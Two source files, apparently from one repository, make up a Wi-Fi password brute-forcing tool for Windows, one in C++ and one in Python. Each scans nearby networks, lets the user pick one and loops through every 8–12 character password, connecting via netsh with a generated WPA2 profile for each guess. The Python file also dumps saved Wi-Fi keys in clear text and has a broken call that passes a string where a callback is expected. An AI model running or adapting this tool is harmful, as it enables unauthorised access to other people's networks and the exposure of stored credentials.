File: WI-FI/guess.cpp
#include <iostream>
#include <vector>
#include <string>
#include <cstdlib>
#include <sstream>
#include <algorithm>
#include <array>
#include <stdexcept>
#include <fstream>
#include <ctime>
#include <thread>
#include <chrono>

// Trim leading and trailing whitespace
std::string trim(const std::string& s) {
    auto start = s.find_first_not_of(" \t\r\n");
    auto end = s.find_last_not_of(" \t\r\n");
    return (start == std::string::npos) ? "" : s.substr(start, end - start + 1);
}

// Function to execute a system command and capture its output
std::string executeCommand(const std::string& command) {
    std::array<char, 128> buffer;
    std::string result;
    FILE* pipe = popen(command.c_str(), "r");
    if (!pipe) throw std::runtime_error("popen() failed!");
    try {
        while (fgets(buffer.data(), buffer.size(), pipe) != nullptr) {
            result += buffer.data();
        }
    } catch (...) {
        pclose(pipe);
        throw;
    }
    pclose(pipe);
    return result;
}

// Function to parse SSIDs from the command output
std::vector<std::string> parseSSIDs(const std::string& output) {
    std::vector<std::string> ssids;
    std::istringstream stream(output);
    std::string line;
    while (std::getline(stream, line)) {
        if (line.find("SSID") != std::string::npos && line.find("BSSID") == std::string::npos) {
            auto pos = line.find(":");
            if (pos != std::string::npos) {
                std::string ssid = trim(line.substr(pos + 1));
                if (!ssid.empty() && std::find(ssids.begin(), ssids.end(), ssid) == ssids.end()) {
                    ssids.push_back(ssid);
                }
            }
        }
    }
    return ssids;
}

// Updated guessPassword function to attempt connection for each guess
void guessPassword(const std::string& ssid, const std::string& characters, int minLength, int maxLength) {
    std::ofstream outFile("found_string.txt");
    if (!outFile.is_open()) {
        std::cerr << "Failed to open output file." << std::endl;
        return;
    }

    size_t attempts = 0;
    std::string command;
    std::vector<char> guess;
    for (int length = minLength; length <= maxLength; ++length) {
        guess.assign(length, characters[0]);
        while (true) {
            // Construct the guessed password
            std::string guessedPassword(guess.begin(), guess.end());
            ++attempts;
            std::cout << "Attempt " << attempts << ": " << guessedPassword << std::endl;

            // Create a temporary WiFi profile with the guessed password
            std::string profileXML = "<?xml version=\"1.0\"?>\n"
                                      "<WLANProfile xmlns=\"http://www.microsoft.com/networking/WLAN/profile/v1\">\n"
                                      "    <name>" + ssid + "</name>\n"
                                      "    <SSIDConfig>\n"
                                      "        <SSID>\n"
                                      "            <name>" + ssid + "</name>\n"
                                      "        </SSID>\n"
                                      "    </SSIDConfig>\n"
                                      "    <connectionType>ESS</connectionType>\n"
                                      "    <connectionMode>auto</connectionMode>\n"
                                      "    <MSM>\n"
                                      "        <security>\n"
                                      "            <authEncryption>\n"
                                      "                <authentication>WPA2PSK</authentication>\n"
                                      "                <encryption>AES</encryption>\n"
                                      "                <useOneX>false</useOneX>\n"
                                      "            </authEncryption>\n"
                                      "            <sharedKey>\n"
                                      "                <keyType>passPhrase</keyType>\n"
                                      "                <protected>false</protected>\n"
                                      "                <keyMaterial>" + guessedPassword + "</keyMaterial>\n"
                                      "            </sharedKey>\n"
                                      "        </security>\n"
                                      "    </MSM>\n"
                                      "</WLANProfile>";

            // Save the profile to a temporary file
            std::ofstream profileFile("wifi_profile.xml");
            if (!profileFile.is_open()) {
                std::cerr << "Failed to create WiFi profile file." << std::endl;
                return;
            }
            profileFile << profileXML;
            profileFile.close();

            // Add the profile to the system
            command = "netsh wlan add profile filename=wifi_profile.xml user=all";
            executeCommand(command);

            // Attempt to connect to the WiFi network
            command = "netsh wlan connect name=\"" + ssid + "\"";
            std::string output = executeCommand(command);

            // Check connection status
            std::string statusOutput = executeCommand("netsh wlan show interfaces");
            if (statusOutput.find(ssid) != std::string::npos && statusOutput.find("connected") != std::string::npos) {
                std::cout << "Password found: " << guessedPassword << std::endl;
                outFile << "Found password: " << guessedPassword << "\nAttempts: " << attempts << std::endl;
                return;
            }

            // Add a delay between attempts to avoid overwhelming the system
            std::this_thread::sleep_for(std::chrono::milliseconds(500));

            // Generate the next permutation
            int i = length - 1;
            while (i >= 0 && guess[i] == characters.back()) {
                guess[i] = characters[0];
                --i;
            }
            if (i < 0) break;
            guess[i] = characters[characters.find(guess[i]) + 1];
        }
    }

    std::cout << "Failed to guess the password." << std::endl;
    outFile << "Failed to guess the password." << std::endl;
}

int main() {
    try {
        std::cout << "Scanning for available SSIDs..." << std::endl;
        std::string commandOutput = executeCommand("netsh wlan show network");
        std::vector<std::string> ssids = parseSSIDs(commandOutput);

        if (ssids.empty()) {
            std::cout << "No SSIDs found." << std::endl;
            return 0;
        }

        std::cout << "\nAvailable SSIDs:\n";
        for (size_t i = 0; i < ssids.size(); ++i) {
            std::cout << i + 1 << ". " << ssids[i] << std::endl;
        }

        int choice = 0;
        std::cout << "\nSelect the SSID by number: ";
        std::cin >> choice;

        if (std::cin.fail() || choice < 1 || choice > static_cast<int>(ssids.size())) {
            std::cerr << "Invalid selection." << std::endl;
            return 1;
        }

        std::string selectedSSID = ssids[choice - 1];
        std::cout << "You selected: " << selectedSSID << std::endl;

        // Define the character set and password length range
        std::string characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
        int minLength = 8;
        int maxLength = 12;

        // Attempt to guess the password
        guessPassword(selectedSSID, characters, minLength, maxLength);

    } catch (const std::exception& e) {
        std::cerr << "Error: " << e.what() << std::endl;
    }

    return 0;
}

File: WI-FI/guess.py
import itertools
import string
import time
import subprocess

def guess_the_string(try_password_callback):
    characters = string.ascii_letters + string.digits + string.punctuation
    attempts = 0

    for length in range(8, 13):  # Generate permutations for lengths 8 to 12
        for guess in itertools.product(characters, repeat=length):
            guessed_string = ''.join(guess)
            attempts += 1
            print(f"Attempt {attempts}: {guessed_string}")

            if try_password_callback(guessed_string):
                print(f"The program guessed the string '{guessed_string}' in {attempts} attempts!")
                with open("found_string.txt", "w") as file:
                    file.write(f"Found string: {guessed_string}\nAttempts: {attempts}")
                return guessed_string

    print("Failed to guess the string.")
    return None

def get_wifi_password(ssid):
    try:
        # Run the command to get WiFi details
        result = subprocess.run(["netsh", "wlan", "show", "profile", ssid, "key=clear"], capture_output=True, text=True)
        output = result.stdout

        # Extract the password from the output
        for line in output.splitlines():
            if "Key Content" in line:
                password = line.split(":")[1].strip()
                print(f"Retrieved WiFi password: {password}")
                guess_the_string(password)  # Use guess_the_string to verify the password
                return password

        print("Password not found in the profile.")
        return None
    except Exception as e:
        print(f"Error retrieving WiFi password: {e}")
        return None

def simulate_brute_force(target_password):
    characters = string.ascii_lowercase + string.digits
    attempts = 0
    start = time.time()

    for length in range(8, 13):  # Updated to guess between lengths 8 to 12
        for guess in itertools.product(characters, repeat=length):
            attempts += 1
            guess_str = ''.join(guess)
            if guess_str == target_password:
                elapsed = time.time() - start
                print(f"Password '{target_password}' found in {attempts} attempts and {elapsed:.2f} seconds.")
                with open("found_string.txt", "w") as file:
                    file.write(f"Found password: {target_password}\nAttempts: {attempts}\nTime: {elapsed:.2f} seconds")
                return

def show_available_ssids():
    try:
        # Run the command to list available WiFi networks
        result = subprocess.run(["netsh", "wlan", "show", "network"], capture_output=True, text=True)
        output = result.stdout

        # Extract SSIDs from the output
        ssids = []
        seen_ssids = set()  # Use a set to track seen SSIDs
        for line in output.splitlines():
            if "SSID" in line and "BSSID" not in line:
                parts = line.split(":", 1)
                if len(parts) > 1:
                    ssid = parts[1].strip()
                    if ssid and ssid not in seen_ssids:  # Avoid empty and duplicate SSIDs
                        ssids.append(ssid)
                        seen_ssids.add(ssid)

        if ssids:
            return ssids
        else:
            print("No SSIDs found.")
            return []

    except Exception as e:
        print(f"Error retrieving SSIDs: {e}")
        return []

def connect_to_wifi(ssid, password):
    try:
        # Create a profile XML for the WiFi connection
        profile_xml = f"""<?xml version=\"1.0\"?>
        <WLANProfile xmlns=\"http://www.microsoft.com/networking/WLAN/profile/v1\">
            <name>{ssid}</name>
            <SSIDConfig>
                <SSID>
                    <name>{ssid}</name>
                </SSID>
            </SSIDConfig>
            <connectionType>ESS</connectionType>
            <connectionMode>auto</connectionMode>
            <MSM>
                <security>
                    <authEncryption>
                        <authentication>WPA2PSK</authentication>
                        <encryption>AES</encryption>
                        <useOneX>false</useOneX>
                    </authEncryption>
                    <sharedKey>
                        <keyType>passPhrase</keyType>
                        <protected>false</protected>
                        <keyMaterial>{password}</keyMaterial>
                    </sharedKey>
                </security>
            </MSM>
        </WLANProfile>"""

        # Save the profile to a temporary file
        profile_path = "wifi_profile.xml"
        with open(profile_path, "w") as file:
            file.write(profile_xml)

        # Add the profile to the system
        subprocess.run(["netsh", "wlan", "add", "profile", f"filename={profile_path}", "user=all"], check=True)

        # Connect to the WiFi network
        subprocess.run(["netsh", "wlan", "connect", f"name={ssid}"], capture_output=True, text=True)

        # Check connection status
        result = subprocess.run(["netsh", "wlan", "show", "interfaces"], capture_output=True, text=True)
        output = result.stdout

        if ssid in output and "State" in output and "connected" in output.lower():
            print(f"Successfully connected to {ssid}.")
            return True
        else:
            print(f"Failed to connect to {ssid}. Output: {output}")
            return False

    except Exception as e:
        print(f"Error connecting to WiFi: {e}")
        return False

if __name__ == "__main__":
    print("Scanning for available SSIDs...")
    ssids = show_available_ssids()
    if ssids:
        print("Available SSIDs:")
        for idx, ssid in enumerate(ssids, start=1):
            print(f"{idx}. {ssid}")

        selected_index = int(input("Select the SSID by number: ")) - 1
        if 0 <= selected_index < len(ssids):
            ssid = ssids[selected_index]
            print(f"Attempting to connect to SSID: {ssid}")

            def try_password(password):
                return connect_to_wifi(ssid, password)

            guess_the_string(try_password)
        else:
            print("Invalid selection.")
    else:
        print("No SSIDs found.")
